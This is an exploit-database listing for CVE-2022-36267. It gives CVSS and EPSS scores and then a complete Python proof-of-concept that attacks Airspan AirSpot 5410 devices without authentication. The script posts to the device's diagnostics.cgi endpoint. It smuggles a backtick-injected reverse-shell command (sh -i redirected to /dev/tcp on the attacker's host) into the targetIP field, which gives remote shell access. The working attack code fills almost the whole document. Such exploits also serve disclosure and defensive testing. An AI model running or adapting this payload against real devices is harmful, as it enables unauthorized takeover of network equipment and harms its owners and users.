AirSpot 5410 0.3.4.1-4 Remote Command Injection Exploit

2022-08-1000:00:00

Samy Younsi

0day.today

270

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

0.205 Low

EPSS

Percentile

96.4%

JSON

# -*- coding: utf-8 -*-

# Exploit Title: AirSpot unauthenticated remote command injection
# Date: 7/26/2022
# Exploit Author: Samy Younsi (NSLABS) (https://samy.link)
# Vendor Homepage: https://www.airspan.com/
# Software Link: https://wdi.rfwel.com/cdn/techdocs/AirSpot5410.pdf
# Version: 0.3.4.1-4 and under.
# Tested on: Airspan AirSpot 5410 version 0.3.4.1-4 (Ubuntu)
# CVE : CVE-2022-36267

from __future__ import print_function, unicode_literals
import argparse
import requests
import urllib3
urllib3.disable_warnings()

def banner():
  airspanLogo = """ 
      ,-.
     / \  `.  __..-,O
    :   \ --''_..-'.'
    |    . .-' `. '.
    :     .     .`.'
     \     `.  /  ..
      \      `.   ' .
       `,       `.   \
      ,|,`.        `-.\
     '.||  ``-...__..-`
      |  | Airspan 
      |__| AirSpot 5410
      /||\ PWNED x_x
     //||\\
    // || \\
 __//__||__\\__
'--------------'Necrum Security Labs
                        
\033[1;92mSamy Younsi (Necrum Security Labs)\033[1;m         \033[1;91mAirSpot 5410 CMD INJECTION\033[1;m                                                 
                FOR EDUCATIONAL PURPOSE ONLY.   
  """
  return print('\033[1;94m{}\033[1;m'.format(airspanLogo))

def pingWebInterface(RHOST, RPORT):
  url = 'https://{}:{}'.format(RHOST, RPORT)
  try:
    response = requests.get(url, allow_redirects=False, verify=False, timeout=30)
    if response.status_code != 200:
      print('[!] \033[1;91mError: AirSpot 5410 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m')
      exit()
    print('[INFO] Airspan device web interface seems reachable!')
  except:
    print('[!] \033[1;91mError: AirSpot 5410 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m')
    exit()


def execReverseShell(RHOST, RPORT, LHOST, LPORT):
  payload = '`sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{}%2F{}%200%3E%261`'.format(LHOST, LPORT)
  data = 'Command=pingDiagnostic&targetIP=1.1.1.1{}&packetSize=55&timeOut=10&count=1'.format(payload)
  try:
    print('[INFO] Executing reverse shell...')
    response = requests.post('https://{}:{}/cgi-bin/diagnostics.cgi'.format(RHOST, RPORT), data=data, verify=False)
    print("Reverse shell successfully executed. {}:{}".format(LHOST, LPORT))
    return
  except Exception as e:
      print("Reverse shell failed. Make sure the AirSpot 5410 device can reach the host {}:{}").format(LHOST, LPORT)
      return False

def main():
  banner()
  args = parser.parse_args()
  pingWebInterface(args.RHOST, args.RPORT)
  execReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT)


if __name__ == "__main__":
  parser = argparse.ArgumentParser(description='Script PoC that exploit an nauthenticated remote command injection on Airspan AirSpot devices.', add_help=False)
  parser.add_argument('--RHOST', help="Refers to the IP of the target machine. (Airspan AirSpot device)", type=str, required=True)
  parser.add_argument('--RPORT', help="Refers to the open port of the target machine. (443 by default)", type=int, required=True)
  parser.add_argument('--LHOST', help="Refers to the IP of your machine.", type=str, required=True)
  parser.add_argument('--LPORT', help="Refers to the open port of your machine.", type=int, required=True)
  main()